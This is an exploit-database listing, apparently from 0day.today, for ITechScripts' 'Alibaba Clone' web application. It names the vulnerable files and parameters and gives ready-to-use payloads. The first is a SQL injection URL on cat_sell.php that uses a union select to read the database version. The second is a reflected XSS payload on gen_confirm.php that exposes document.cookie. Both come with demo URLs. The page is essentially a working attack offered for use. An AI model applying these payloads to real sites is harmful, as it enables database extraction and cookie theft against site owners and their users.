[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ITechSctipts Alibaba Clone Multiple Vulnerabilities

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10682
Category
web applications
Date add
16-01-2010
Platform
unsorted
===================================================
ITechSctipts Alibaba Clone Multiple Vulnerabilities
===================================================

/*
 
Name : ITechSctipts Alibaba Clone
Site : http://itechscripts.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=24&option=com_virtuemart
 
Author : Hamza 'MizoZ' N.
 
Greetz : Zuka , Sellim
 
*/
 
# SQL Injection :
 
File : cat_sell.php , Get : cid
 
[HOST]/[PATH]/cat_sell.php?cid=-7+union+select+1,version(),3,4,5,6,7,8--
 
Demo : http://server/cat_sell.php?cid=-7+union+select+1,version%28%29,3,4,5,6,7,8--
 
# XSS :
 
File : gen_confirm.php , Get : errmsg
 
[HOST]/[PATH]/gen_confirm.php?errmsg=[SCRIPT]
 
Demo :  http://server/gen_confirm.php?errmsg=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



#  0day.today [2024-12-24]  #